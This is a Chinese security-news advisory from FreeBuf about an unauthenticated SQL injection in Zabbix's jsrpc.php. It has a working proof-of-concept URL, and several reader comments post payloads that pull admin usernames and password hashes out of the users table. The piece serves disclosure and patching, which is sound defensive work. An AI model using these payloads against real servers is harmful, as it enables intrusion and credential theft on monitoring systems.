漏洞预警:zabbix再爆高危SQL注入漏洞,可获操作系统权限

2016-08-17 812746人围观 ,发现 46 个不明物体 漏洞

zabbix.jpg

漏洞概述

zabbix是一个开源的企业级性能监控解决方案。近日,zabbix的jsrpc的profileIdx2参数存在insert方式的SQL注入漏洞,攻击者无需授权登陆即可登陆zabbix管理系统,也可通过script等功能轻易直接获取zabbix服务器的操作系统权限。 但是无需登录注入这里有个前提,就是zabbix开启了guest权限。而在zabbix中,guest的默认密码为空。需要有这个条件的支持才可以进行无权限注入。

官方网站:

http://www.zabbix.com

影响程度

攻击成本:低

危害程度:高

是否登陆:不需要

影响范围:2.2.x, 3.0.0-3.0.3。(其他版本未经测试)

漏洞测试

在您的zabbix的地址后面加上如下url:

jsrpc.php?type=9&method=screen.get&timestamp=1471403798083&pageFile=history.php&profileIdx=web.item.graph&profileIdx2=1+or+updatexml(1,md5(0x11),1)+or+1=1)%23&updateProfile=true&period=3600&stime=20160817050632&resourcetype=17

输出结果,如下表示漏洞存在:

2.png

补充

以上为仅为漏洞验证测试方式。

攻击者可以通过进一步构造语句进行错误型sql注射,无需获取和破解加密的管理员密码。

有经验的攻击者可以直接通过获取admin的sessionid来根据结构算法构造sid,替换cookie直接以管理员身份登陆。

修复方案

尽快升级到最新版,据说3.0.4版本已经修补。

安全提示

监控系统监控着每个企业的核心资产,一旦被黑客入侵控制,等同帮助黑客进一步渗透企业敞开了大门。

请大家务必重视,并尽快修补此漏洞。

漏洞报告详情:http://seclists.org/fulldisclosure/2016/Aug/82

信息来源:三矛科技微信公众号转载请注明来自FreeBuf黑客与极客(FreeBuf.COM)

这些评论亮了

  • xxx 回复
    读密码
    /jsrpc.php?type=9&method=screen.get&timestamp=1471403798083&pageFile=history.php&profileIdx=web.item.graph&profileIdx2=1+or+updatexml(1,(select(select+concat(0x7e,alias,0x7e,passwd,0x7e))+from+zabbix.users+LIMIT+0,1),1)+or+1=1)%23&updateProfile=true&period=3600&stime=20160817050632&resourcetype=17
    密码有点长,读不全
    )27( 亮了
  • hashman (1级) 回复
    @ xxx 用floor,updatexml长度太短了。/jsrpc.php?type=9&method=screen.get&timestamp=1471403798083&pageFile=history.php&profileIdx=web.item.graph&profileIdx2=1 or (select 1 from (select count(*),concat((select (select concat(passwd)) from zabbix.users limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) or 1=1)%23&updateProfile=true&period=3600&stime=20160817050632&resourcetype=17
    )25( 亮了
  • 周鸿祎 回复
    补一句,用中间16位就可以了
    )20( 亮了
  • 你确认你文章准确,我的2.4.6,其他人的3.0.4 也检测出和你说的一样输出结果
    http://x.x.x.x/jsrpc.php?sid=0bcd4ade648214dc&type=9&method=screen.get&timestamp=1471403798083&mode=2&screenid=&groupid=&hostid=0&pageFile=history.php&profileIdx=web.item.graph&profileIdx2=(updatexml(0x5e,(md5(0x313233)),0x5e))&updateProfile=true&screenitemid=&period=3600&stime=20160817050632&resourcetype=17&itemids%5B23297%5D=23297&action=showlatest&filter=&filter_task=&mark_color=1
    )20( 亮了
  • 话说 回复
    想请问下,为啥freebuf墙外访问很慢啊?
    我inoreader订阅http://www.freebuf.com/feed/一直就是超时啊。。。
    真的可惜了这全文feed啊。。。
    )18( 亮了
发表评论

已有 46 条评论

取消
Loading...
css.php